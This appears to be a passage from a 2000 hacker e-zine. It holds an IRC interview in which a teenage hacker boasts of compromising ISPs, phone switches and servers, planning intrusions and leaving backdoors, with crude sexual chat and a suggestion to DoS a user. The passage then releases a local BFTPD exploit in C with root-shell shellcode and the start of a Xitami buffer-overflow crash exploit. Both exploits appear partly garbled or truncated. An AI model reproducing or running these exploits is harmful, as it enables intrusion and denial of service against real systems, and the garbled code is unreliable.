<[HWA]> they have no release date either, computers show no street date. 
[17:29] so they choosed to call DEC BEC [17:29] digital -> binary [17:29] heh [17:29] it sounded nice [17:29] <[HWA]> nod [17:29] nope [17:29] it's been out for many months [17:29] <[HWA]> if you see it let me know [17:30] <[HWA]> yes but not here [17:30] ok [17:30] <[HWA]> it was released in France i believe at a film festival [17:30] <[HWA]> do you code? [17:30] an yur from? [17:30] i code [17:30] <[HWA]> I'm from England i'm located in Canada presently. [17:31] <[HWA]> :) [17:31] heh [17:31] <[HWA]> how long have you been on the net, did you ever BBS? [17:31] <[HWA]> did you ever run a BBS? [17:31] i'v been on the net since 96 [17:31] i still BBS [17:31] <[HWA]> how old are you? [17:31] <[HWA]> do you wardial? [17:31] i'm 17 [17:31] soon 18 [17:32] no, i \/\/4rd4yl [17:32] <[HWA]> how about telephone phun? do you phreak? [17:32] i am a phreak [17:32] and i phreak [17:32] <[HWA]> trunk seizing is phun [17:32] i reverse enginered a ITU-T node [17:32] <[HWA]> what is the tone to seize a trunk in Scandinavia? its 2600 in the U.S and North America [17:32] me and a friend drove up to the local switching station [17:33] <[HWA]> what did you do with it? this is the one located near ur house? [17:33] it's two metres high and 40cm deep [17:33] i have it right behind me [17:33] to watch [17:33] heh :) [17:33] i love phones [17:33] i have done so much shit with phones [17:34] <[HWA]> note: dear repairman this phone is out of service please replace it we need a new coin drop mechanism [17:34] i can do whatever i want to whoever i want in seeden [17:34] <[HWA]> sweden? [17:34] <[HWA]> you own switches? [17:34] darn [17:34] oh yeah [17:34] <[HWA]> what is the tone you didn't answer [17:34] <[HWA]> 3144? [17:34] huh? [17:34] <[HWA]> to seize a trunk [17:35] <[HWA]> its 2600hz in NA [17:35] i don't do that phreaking stuff [17:35] <[HWA]> ah [17:35] no b0xing technique [17:35] <[HWA]> how then do you own the equipment? 
[17:35] i hax0rized them [17:35] <[HWA]> how do you access the internal networks? [17:35] with my evil mind [17:35] i find their "secret" number [17:35] thsi si quite phun actually [17:35] <[HWA]> dialup and social engineering? [17:35] they are smart them bastahs [17:36] <[HWA]> when you connect to the net what method do you use? [17:36] you knwo taht there are numbers wich costs liek "Ł2" a minute to call [17:36] <[HWA]> do u connect direct from home? [17:36] <[HWA]> nod [17:36] they have all their evil stuff on such numbers [17:36] where noone wardial [17:36] <[HWA]> aha [17:36] but i found out [17:36] <[HWA]> so how do you find these without incurring charges? [17:36] and by cheer luck [17:37] i found a number with a kewl thing [17:37] <[HWA]> ? [17:37] a support line of somekind [17:37] i engineered them [17:37] <[HWA]> its kinda vague [17:37] they gave me a number to a support line for phoneswtiching troublke [17:37] <[HWA]> what is the software that controls the switches called? [17:37] i called them up [17:37] Local 7 [17:37] <[HWA]> aka Cosmos [17:38] <[HWA]> what does it run on? [17:38] Local 7 [17:38] <[HWA]> (just curious) [17:38] <[HWA]> do you know what the hardware is? [17:38] ISDN switches from ericsson [17:38] <[HWA]> ericsson! [17:38] they use ITU-T standard shyt [17:38] (CCiTT-7) [17:39] <[HWA]> do you do conference calls? [17:39] nope [17:39] <[HWA]> 'confs [17:39] <[HWA]> have you ever? [17:39] noone wants to talk w/ me [17:39] <[HWA]> hrm what about prank calling [17:39] i have back in 97 [17:39] i'v done that [17:39] <[HWA]> most phreaks seem to go thru a conf stage and prank calling stage [17:39] i'v done alot with phones like i said [17:39] <[HWA]> some never grow out of it [17:40] <[HWA]> so you're 17 now you were how old when you started? [17:40] <[HWA]> 12 [17:40] 12 [17:40] when i was young and naive [17:40] and evil [17:40] i was after power, not knowledge [17:40] <[HWA]> what was your first home computer? 
or did you use school/elsewhere's equipment first? [17:40] TSR 180 [17:40] <[HWA]> like what got you into computers to begin with? [17:40] my brothers box [17:40] <[HWA]> Wargames? [17:41] <[HWA]> :) [17:41] i think it was 85 [17:41] 87 we got a c64 [17:41] <[HWA]> did you play games or code straight away? [17:41] and 89 an amiga 5000 [17:41] 500 [17:41] eveb [17:41] i played alot [17:41] <[HWA]> pirated? [17:41] yes [17:41] i cracked codes [17:41] for levels [17:42] so i could finnish the game faster [17:42] and stuff [17:42] <[HWA]> what about the games themselves, crack any copy protection? [17:42] nope [17:42] i support the amiga scene [17:42] supported even [17:42] <[HWA]> did you ever get into the pirate scene at all, courier etc or anything ? [17:42] no cracking of codes [17:42] nope [17:42] <[HWA]> ok [17:42] <[HWA]> many do/did [17:43] i was only interested in playing [17:43] <[HWA]> so you first got onto the internet in 1996? [17:43] and controling the box [17:43] <[HWA]> what OS were you running then? [17:43] no, that was in 95 [17:43] Windows 3.11 [17:43] from my school [17:43] <[HWA]> ok 1995. did you run ibm clone and windows? [17:43] <[HWA]> what OS do you run now? [17:43] <[HWA]> Linux? [17:43] i owned an amiga1200 then [17:44] running Amiga OS 3.1 [17:44] i think [17:44] <[HWA]> Minix was available for the Amiga or Qnix [17:44] and sucked [17:44] <[HWA]> I think there is even a linux for Amiga, not sure [17:44] <[HWA]> possibly coherent also [17:44] tehre are many [17:44] <[HWA]> nod [17:44] Turbo/falcon/redhat [17:44] <[HWA]> do you use a unix variety now though? [17:44] <[HWA]> or still use windows mainly? [17:44] i only use unix [17:45] <[HWA]> which flavour? [17:45] i HATE windows [17:45] and will never use it [17:45] <[HWA]> what about X Windowss [17:45] solaris/FreeBSD [17:45] <[HWA]> -s [17:45] CDE [17:45] <[HWA]> whats CDE? 
i should probably know but i'm blank on it [17:45] Cumm0nd3zk70p env4yr0m3n7 [17:45] <[HWA]> ah yea [17:45] <[HWA]> ok [17:45] it's HP's/SGI's/Sun's own version of MWM [17:46] looks and feels like mwm [17:46] <[HWA]> what do you want BeC to do, what is BeC planning to do in the future? [17:46] i want to "be nauhty at tsutomus sight" [17:46] by owning ariel.sdsc.edu [17:46] and not letting him access it [17:46] <[HWA]> are you interested in computer security as a possible area of work or do you work in compsec at any level now? [17:47] heh [17:47] <[HWA]> why target shimomura, because he owned mitnick? [17:47] i think i'll prolly end up working as a unix admin somewhere [17:47] he did it for the money [17:47] <[HWA]> is mitnick an idol of yours? [17:47] i like his style [17:47] <[HWA]> yes and the fame [17:47] he didnt do anything special [17:47] but he did alot [17:47] <[HWA]> mitnick is a net/phreak addict [17:47] like, back in teh 80;s [17:51] *** Disconnected [18:00] *** Rejoined channel #INTERVIEW_BeC [§] Channel [ #INTERVIEW_BeC ] Modes [ +k ] [18:00] <[HWA]> [17:48] <[HWA]> do you have any experience with radios like mitnick (and myself) do? ie:ham gear? [18:00] <[HWA]> [17:48] <[HWA]> example: packet radio or 2m/440cm repeaters etc [18:00] <[HWA]> [17:48] <[HWA]> licensed or not. [18:00] <[HWA]> [17:48] <[HWA]> never get into that? [18:00] <[HWA]> [17:49] <[HWA]> you can phreak and access the net using ham equipment, i've irc'd on packet radio with a hand held radio and tnc [18:00] <[HWA]> [17:49] <[HWA]> hooked to a freebsd box [18:00] hmmss [18:00] <[HWA]> ./. [18:01] <[HWA]> mitnick is a ham radio op thats why i ask [18:01] <[HWA]> he was hoping to get his license back after his release from jail i dont know if he was allowed it or not [18:01] ok [18:01] <[HWA]> i wrote an article on it. 
[18:02] <[HWA]> we're pretty much nearly ready to wrap up here i think anyway [18:02] <[HWA]> unless you have much more to say [18:02] nope [18:03] <[HWA]> I don't have much in the way of questions since BeC is relatively new [18:03] no radio [18:03] i would like to know thou [18:03] how to play w/ radios [18:03] hmmss [18:03] is he allowed to use hamradios ? [18:03] ok [18:03] i hope he will come online soon [18:03] and join #hwa-security [18:03] os i can ask him stuff [18:03] about tsutomu [18:03] so that i can defeat him [18:03] 'MWAHAHAHAHAHHAHA [18:03] <[HWA]> not sure [18:03] i dono [18:03] ask me stuff and i'll answer [18:03] heh [18:03] june 2000 [18:03] not sure? [18:03] <[HWA]> dunno what to ask, i'm questionless :( [18:04] ask me if i have a glass of water [18:04] <[HWA]> what about June 2000 [18:04] bec was created then [18:04] <[HWA]> ah [18:04] <[HWA]> so backtracking , what has BeC done since its inception? [18:05] <[HWA]> and how many members? or is it a front group for one man? [18:05] ok, so where done then [18:05] let's talk about mafiaboy [18:05] <[HWA]> pretty much [18:05] we are 3 [18:05] i "think" [18:05] <[HWA]> why 'think'? [18:05] and we have done notjing [18:05] <[HWA]> an undecided member? [18:05] i havent heard or seen one of them for two months [18:05] i think he is either dead or busted [18:05] <[HWA]> but you are serious on targetting Tsutomu's computers or is that just a pipe dream? [18:05] "the CC# guy" [18:06] <[HWA]> busted [18:06] it's a pipe dream [18:06] <[HWA]> hrm [18:06] <[HWA]> he from same area or another country? [18:06] he's from the us [18:06] <[HWA]> what about the other member? [18:06] <[HWA]> can you say nicks? [18:06] i don't want to talk about other ppl [18:06] heh [18:06] <[HWA]> ok [18:06] for understandable reasons [18:07] ok, now [18:07] Mafiaboy [18:07] <[HWA]> we're done then thanks for talking with us about BeC. 
[18:07] <[HWA]> mafiaboy, what about him [18:07] yeah [18:07] that is what i am asking [18:07] *** [HWA] is now known as nobracket [18:07] what about him [18:08] what has he done that is so cool [18:08] he was busted for distributed denial of service attacks on major commercial sites [18:08] the names of which escape me at the moment [18:08] yuck [18:08] he had hacked root in order to run mstream on them [18:08] he probably thinks that is cool [18:09] i believe 100 or so roots [18:09] that is nothing [18:09] wasted (imho) on a ddos net [18:09] he was probably just a script kiddie [18:09] he held down these sites for 15 hrs or so and bragged about it openly on irc [18:09] i mean, finding 100 [18:09] boxes isnt that hard [18:09] this was logged and sent to vetesgirl and i also got a copy and published the logs [18:09] i hold on to my sites for life [18:10] girl? [18:10] GIRL? [18:10] ever come across a honeypot? [18:10] is she goodlooking?` [18:10] yes vetesgirl she wrote 'vetescan' among other things [18:10] i want her [18:10] heh [18:10] I don't know she could look like dianora for all I know [18:11] (ROFL) [18:11] or she could look like,.. nice [18:11] so, what did mafiaboy say to her, [18:11] > >[Dianora ) I want it back [18:11] > >[VetesGirl ) ur a fucking liar [18:11] > >[VetesGirl ) don't accuss me of shit until u have the facts dear [18:11] > >[VetesGirl ) I don't take channels [18:11] > >[VetesGirl ) and had no fucking part in html [18:11] > >[Dianora ) you are on #html which was taken [18:11] > >[VetesGirl ) I am there legit [18:11] > >[VetesGirl ) i was invited and op'd [18:11] > >[VetesGirl ) I had no part in a take [18:11] and what channel [18:12] heh [18:12] dionara = mafiaboy i reckon [18:12] dianora is an irc oper she codes ircd [18:12] ok [18:12] vetesgirl's site is http://www.self-evident.com/ [18:13] so, what did mafiaboy say then [18:13] briefly [18:13] you never heard of dianora or vetesgirl? 
[18:13] i'v heard about vetesgirl [18:13] http://www.self-evident.com/refnet_old_news.html [18:13] but not dionara [18:14] so [18:14] did mafiaboy get jail [18:14] or did he get the chair? [18:14] as in "theee chair" [18:14] jail [18:14] bha [18:15] for how lonmg? [18:15] +--------------------------------------- [18:15] | mafiaboy <~guest@www.oaklandathletics.com> (Internic Commercial) [18:15] ¦ ircname / ./slice 0 cnn.com 22 80 [18:15] ¦ server / irc.mcs.net ([192.160.127.97] MCSNet Services - [18:15] (312)803-MCS1) [18:15] +-------------------------------------------------- [18:15] and how did they bust him [18:15] many questions [18:15] http://www.self-evident.com/exploits/vetes [18:15] http://www.self-evident.com/exploits/vetes [18:15] check it [18:15] ok [18:15] those are the logs [18:16] she busted him? [18:16] evil girl [18:16] i don't like whiteruss [18:16] http://users3.cgiforme.com/vadia/cfmboard.html [18:16] or cyphex [18:16] heh [18:16] how could they trace him [18:16] i dont like a lot of people but play the devils advocate and mr noncomittal [18:17] heh didn't clean up after dinner? [18:17] you see [18:17] that and also it was rumoured someone narqed him out [18:17] now he's "tounting" enslaved [18:17] please kick him [18:17] witch reason KrD [18:17] it would make me really happy [18:17] :) [18:18] or D0S him [18:18] and blaim mafiaboy [18:18] his message was posted by mafiaboy, posted on April 13, 2000 at 18:56:17 coming from No domain available [18:18] YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE ISNT [18:18] GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER! 
[18:18] he did packet her site and kept it down for some time [18:18] heh [18:19] i would never doo that [18:19] This message was posted by VetesGirl, posted on April 15, 2000 at 07:05:18 coming from gm.is [18:19] This message is a reply to BITCH IM BACK!! posted from mafiaboy posted at April 13, 2000 at 18:56:17 [18:19] > YOU LITTLE FUCKING SLUT, YOU ACTUALLY THOUGHT THEY CAUGHT ME? YOUR A FUCKING RETARDED NARC YOU SHOULD KNOW THAT ALL YOUR FUCKING INFORMATION IS WRONG YOU DUMB ASS WHORE AND WHEN IM BACK THIS PAGE [18:19] ISNT GONNA EXSIST ANYMORE YOU DUMB BITCH!! WERD OSB WERD ADPRO WERD SKIZER! [18:19] #1 if it is you, you are proably pr [18:19] shit [18:19] 1 if it is you, you are proably pretending that u didn't get caught so you can get your ass out of trouble and you are proably now a ci (confidential informant) [18:19] #2 Nark?? After the fact maybe You were on efnet msging everyone you could about the attacks and even msg'd your enemies (not a real bright move) and were putting on DoS shows in #!TNT (takes brains), lets see FBI heard about you on the 9th and the news was [18:19] posted on my page on the 13th I didn't come in first DAMN! [18:19] #3 Facts are correct you were o [18:19] on dsuper i remember you back in those days and the logs are true. [18:19] #4 Threaten all you like hun i know how it is and can say been there done that. Why do you packet? does it make you feel like a man, you gain respect from other lil boys who are just like you? You get to be SOMEBODY on efnet for a day wooohoo how leet [18:19] I honestly feel sorry for you. 
[18:19] -=-
[18:20] http://abcnews.go.com/sections/tech/DailyNews/webattacks000418.html
[18:20] no
[18:21] you might as well invite #linux.se
[18:21] I let almost ANYONE in on PROBATION
[18:21] if they suck they get the boot
[18:21] he p33rs me
[18:21] so far i see nothing from him
[18:21] but that's my problem
[18:21] heh
[18:21] well, he kicked himself
[18:21] so, i'm satisfied
[18:21] i don't understand that someone
[18:21] can be so famous for dosing sites
[18:22] that is so lame
[18:22] Mafiaboy and the 15-year-old claimed credit for attacking
[18:22] not only CNN.com but also E*TRADE and several
[18:22] smaller sites. Mafiaboy also shared technical information
[18:22] that only someone involved in the attacks would know,
[18:22] Lyle said.
[18:22] i mean, if i would (and i can) relay ALL calls
[18:22] from sweden to you
[18:22] “Mafiaboy was saying ‘What should I hit next? What
[18:22] should I hit next?’ and people on the channel were
[18:22] suggesting sites, and Mafiaboy was saying, ‘OK, CNN,’”
[18:22] would i get famous
[18:22] NO
[18:22] A subscriber called “Mafiaboy” previously held two
[18:22] accounts with Delphi Supernet, a Montreal Internet
[18:22] service provider that Toronto-based ISP Internet Direct
[18:22] bought last year.
[18:22] The accounts were closed in March 1998 because
[18:22] Mafiaboy violated subscriber policies, but Internet Direct
[18:22] would not say what the violations entailed.
[18:22] hahaha
[18:22] i thought he was from Montreal
[18:22] hrm
[18:22] heh
[18:23] Investigators were able to trace the attacks to Mafiaboy
[18:23] by examining the log files of a computer at a University of
[18:23] California at Santa Barbara research lab, which was
[18:23] among those used to attack the CNN.com site.
[18:23] The Royal Canadian Mounted Police is expected to
[18:23] announce the arrest in a press conference Wednesday at
[18:23] 10:30 a.m. ET.
The Justice Department and the FBI,
[18:23] which assisted in the investigation, also are expected to
[18:23] make a statement afterward.
[18:23] heh
[18:23] i remember that was watching the conference on CNN
[18:23] it was boring
[18:24] if i would get busted for everything i'v done
[18:24] i would be hunted like mitnick
[18:24] and more famous
[18:24] we (hwa) also staged a massive phake media conference and opened up a chat channel called #mediaevent did you read about that?
[18:24] mafiaboy or his "friend" showed up.
[18:24] nope
[18:24] heh
[18:24] its in one of the zine issues
[18:24] the logs
[18:25] quite funny, wired was going to do a story on it but later declined
[18:25] can you dcc a .gz with the latest issue?
[18:25] since it was of course a hoax
[18:25] i'm lacy
[18:25] hmms
[18:25] i can dcc a zip
[18:25] i'v been thinking about this for 4 minutes
[18:25] and
[18:25] no, gz
[18:25] but if u want gz no prob
[18:25] sec
[18:25] chill even
[18:25] just "be there"
[18:26] and do absolutely nothing
[18:26] you can be an underground rumour mill informer
[18:26] :-)
[18:26] heh
[18:26] sure
[18:26] i can start rumors ;)
[18:26] ok, well
[18:26] sure
[18:26] :)
[18:26] where to direct to? pop is broken right now
[18:26] :(
[18:26] do i get op on #hwa-security?
[18:27] those webmails are quite good actually
[18:27] done
[18:27] ok
[18:28] i'm planning to setup a cpt account @sun.com
[18:28] krd@sun.com ,.. yumme
[18:28] lol
[18:28] heh
[18:28] set one up for me too
[18:28] nophear@sun.com
[18:28] ;)
[18:28] ^[@sun.com :)=
[18:28] fwd to nophear@hwa-security.net
[18:28] (not bracket)
[18:28] are you on there?
[18:28] and they will trace you in five seconds
[18:28] you owned sun?
[18:29] i was
[18:29] haha
[18:29] www.sun.se
[18:29] cool
[18:29] they sent me a copy of solaris
[18:29] for "my trouble"
[18:29] i liked it
[18:29] i owned some NS and lost em, pissed me off they didn't remove the backdoors, they shut down the servers completely
[18:29] never came back up so must have changed ips
[18:29] weird
[18:29] i used to own three ISP's in sweden
[18:29] .jp boxen
[18:29] *.?? telia.com and
[18:29] ever do any carding?
[18:30] swipnet.se
[18:30] no carding
[18:30] until algonet busted me
[18:30] that was april 97
[18:30] :)
[18:30] i dialed into them
[18:30] ok
[18:30] what happened in the bust?
[18:30] how did they catch ya?
[18:30] they called me up
[18:30] i used my first account
[18:30] guest23
[18:30] thats how i got in
[18:30] haha
[18:31] guest??/@???net
[18:31] then rooted them?
[18:31] and i wanted to try my new backdoor
[18:31] so i called them up
[18:31] saw lpc: down
[18:31] and the minute later the phone rang
[18:31] what scanner if any do you use? any other tools you use or recommend to wannabe hax0rs?
[18:31] and asked me "do you own a computer with a modem"
[18:31] lol
[18:31] i like, died
[18:31] there are no wannabee hax0rs anymore
[18:31] "my dad does"
[18:31] they are all windows users
[18:31] think not?
[18:32] i think there are some
[18:32] i started as an amiga user
[18:32] everybody nowadays will grow up with GUI only
[18:32] and no eleet stuff
[18:32] i met this kidd though on a system
[18:32] i started on a trs80 but first own computer was a vic20 with 5k memory
[18:32] i saw he was a hacker right at once
[18:32] so i staled him
[18:32] stalked even
[18:32] staled?
stalked
[18:32] ok
[18:32] why
[18:32] and talked him and said i was the sysadmin
[18:32] heh
[18:33] later i told the truth
[18:33] haha
[18:33] he was only 14
[18:33] and still owned the net
[18:33] their
[18:33] he will become something for sure
[18:33] he wrote all his shit by hand
[18:33] with C
[18:33] what do you mean, "he will become something for sure"
[18:33] a hacker
[18:33] a REAL hacker
[18:34] ah so he was skilled and you respect him ok
[18:34] no
[18:34] did he teach you anything?
[18:34] not sure what you're meaning then
[18:34] but he was about as good as i was when i was 13
[18:34] still, he knew what he was doing
[18:34] what about the scanners/tools?
[18:35] nmap
[18:35] and /usr/bin/rpcinfo
[18:35] /usr/sbin/rpcinfo even
[18:35] that is what i use
[18:35] have you exploited dns cache poisoning?
[18:35] jizz.c
[18:35] no
[18:35] erect.c
[18:35] etc
[18:36] friend came up with the concept he was first to do it
[18:36] i try not to use exploits
[18:36] i want to root the box by hand
[18:36] i have me evil trix to get root
[18:36] erm
[18:36] not here
[18:36] brb
[18:36] heh
[18:36] sorry
[18:39] who is zoa?
[18:40] [18:38] *** Zoa_Chien (~Michelle@dial-15.kulak.ac.be) has joined #hwa-security
[18:40] [18:39] are they STALKING ME
[18:40] [18:39] Zoa_Chien, you will NEVER get me
[18:40] [18:39] euhm.. Kr_D stoned again ?
[18:41] [18:40] but i was evil to kulac.ac.be
[18:41] [18:40] hmmss
[18:41] [18:40] enjoy ku*.??.be
[18:41] [18:40] and enjoy k*.??.be too
[18:41] [18:40] ok
[18:41] Zoa_Chien is ~Michelle@dial-15.kulak.ac.be * sempronia
[18:41] Zoa_Chien on #hwa-security
[18:41] Zoa_Chien using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE
[18:41] [18:40] are you after me?
[18:42] [18:40] you know you can never capture me
[18:42] [18:41] Krd.. i don't even want to look after you :-)
[18:42] i'll include this too
[18:42] heh
[18:42] yeah
[18:42] heh
[18:43] shit
[18:43] everytime
[18:43] i use rixtele.com as ISP
[18:43] i feel, like someone is watching me
[18:43] cause sometime
[18:43] the modem disconnects when i try to haxor
[18:43] and i have already got busted once for owning kevin.rixtele.com
[18:43] by rixtele.com
[18:43] Kr_D is ~k0rrupt@213.x.x.x * Korrupt@sweden
[18:43] Kr_D on @#chat-along.with-setvie #hwa-security @#INTERVIEW_BeC #hwa.hax0r.news #it99
[18:43] Kr_D using irc.light.se [195.67.208.172] It's alive, it's AAALIIIIVEEE
[18:43] it feels like some site has contacted rixtele.com
[18:43] setvie
[18:43] ;)
[18:43] and now they are sniffing my ass
[18:44] lol
[18:44] no, i'm serious
[18:44] sniffing your ass like the DOGS they are!
[18:44] i got a REALLY bad feeling
[18:44] about them
[18:44] hrm
[18:44] ditch em
[18:44] yeah
[18:44] i only use them sometime
[18:44] like _now_
[18:44] hey you think a dvd player left on pause overnight will burn the cd?
[18:44] heh
[18:45] dono
[18:46] ?
[18:46] * Cruciphux is back. hi. ..(2h19m50s)
[18:47] [18:46] Zoa_Chien
[18:47] [18:46] Zoa_Chien
[18:47] [18:46] whoohooo
[18:47] [18:46] yes ?
[18:47] [18:46] are you stalking me
[18:47] [18:47] yes :-)
[18:47] brb
[18:50] http://www.ntsource.com/~xxxxxx/efnet/
[18:56] [18:54] ok
[18:56] [18:54] so what are you wearing?
[18:56] [18:54] nothin' much
[18:56] [18:54] mmmm
[18:56] [18:55] want to see mi pic ?
[18:56] [18:55] i want to
[18:56] [18:55] i run windows on a sparc ultra10
[18:56] [18:55] yeah me too
[18:56] [18:55] if you promise you are a redhet with firm tits
[18:56] [18:55] its me and my sister
[18:56] [18:55] readhead even
[18:56] [18:55] lol
[18:56] [18:55] http://www.securax.org/xx/xxxo/
[18:58] [18:56] you look injured
[18:58] [18:57] yeah we dont need that shit
[18:58] [18:57] the door is over there ->
[18:58] [18:57] dammit
[18:58] [18:57] hold up
[18:58] [18:57] *** Cruciphux sets mode: -o+b Zoa_Chien *!*Michelle@*.ac.be
[18:58] [18:57] *** Zoa_Chien was kicked by Cruciphux ((ar) sick puppy)
[19:04] *** Cruciphux has quit IRC (Ping timeout: 360 seconds)
[19:04] *** Disconnected

See more from the BeC interviews and history in future issues.

Session Time: Sun Oct 29 00:00:00 2000

Cruci

@HWA

328.0 [HWA] Releases: eth0 releases sscan2k-pre6 scanner
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://hwa-security.net
http://hwa-security.net/hot.html

Check http://hwa-security.net for more also check http://hwa-security.net/hot.html for new releases.

http://hwa-security.net/hot-new/sscan2k-pre6.HWA.tar.gz

@HWA

329.0 [HWA] Release: WhiteRuss w00p local BFTPD exploit PoC
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://hwa-security.net
http://hwa-security.net/hot.html
http://hwa-security.net/hot-new/HWA-w00p-local.c

/* RELEASED BY Cruciphux HWA-SECURITY.NET */
/* w00p.c (HWA-w00p-local.c) */
/* coded: Oct 25th */
/* released Oct 29th */
/* REMOTE exploit based on w00p.c forthcoming */
#include
#include
#include
#define ADDRS 54
/* GREETZ TO JBUST, SKRIPT KIDDIES(I WUZ ONE), Enslaved, AND HWA-SECURITY*/
/* VENGLIN, ETH0, CRUCIPHUX, ***non crippled version***. Have fun.
/* Jbust is off of IRC h3h3 anyhow l4m3rz chroot() code */ char linuxcode[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x31\xdb" "\x43\x89\xd9\x41\xb0\x3f\xcd\x80\xeb\x6b\x5e\x31\xc0\x31" "\xc9\x8d\x5e\x01\x88\x46\x04\x66\xb9\xff\x01\xb0\x27\xcd" "\x80\x31\xc0\x8d\x5e\x01\xb0\x3d\xcd\x80\x31\xc0\x31\xdb" "\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9\x31\xc0\x8d\x5e" "\x08\xb0\x0c\xcd\x80\xfe\xc9\x75\xf3\x31\xc0\x88\x46\x09" "\x8d\x5e\x08\xb0\x3d\xcd\x80\xfe\x0e\xb0\x30\xfe\xc8\x88" "\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\x89" "\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0\x31" "\xdb\xb0\x01\xcd\x80\xe8\x90\xff\xff\xff\x30\x62\x69\x6e" "\x30\x73\x68\x31\x2e\x2e\x31\x31"; int main(argc, argv) int argc; char **argv; { char buf[BUFSIZ], *p; long ret = 0xbffff960, *ap; int noplen; int align, i; if (argc != 3) { fprintf(stderr, "Just_For_you: %s ie ./HWA-w00p test 1024\n", argv[0]); exit(0); } align = atoi(argv[1]); memset(buf, 0x90, 49); buf[50] = '\0'; strcat(buf, linuxcode); ret += atoi(argv[4]); for(i=0;i. (sorry becouse of my poor style) This is part of Readme.txt: "You want ROCK-SOLID industrial-strength STABILITY? Xitami will run for years without maintenance. We use a special memory management library to detect and flush-out memory leaks." -- I don`t think so... The same version of Xitami Ftpserver is vulnurable to con/con bug, just type cd con/con and it will crash the server... Greets to my friends from anonyunity, hwa-security and Cyberx- You know who you are ;] Also thanks to xfer ( sam wiesz najlepiej za co :> ) and superluck (becouse of helping me:>) :>, and k.g :[ Poland, 2000. 
forrest@hq.hack.pl forrest@hwa-security.net comments about this or any other code to contact@hwa-security.net - Cruciphux RELEASED BY Cruciphux http://hwa-security.net/ OCT 27 2000 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include void main(int argc, char *argv[]) { int sock; struct in_addr addr; struct sockaddr_in sin; struct hostent *he; char *cgistr; char buffer[1024]; int count=0; int numin; char get[1024]; char *buff[50]; buff[1] = "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" 
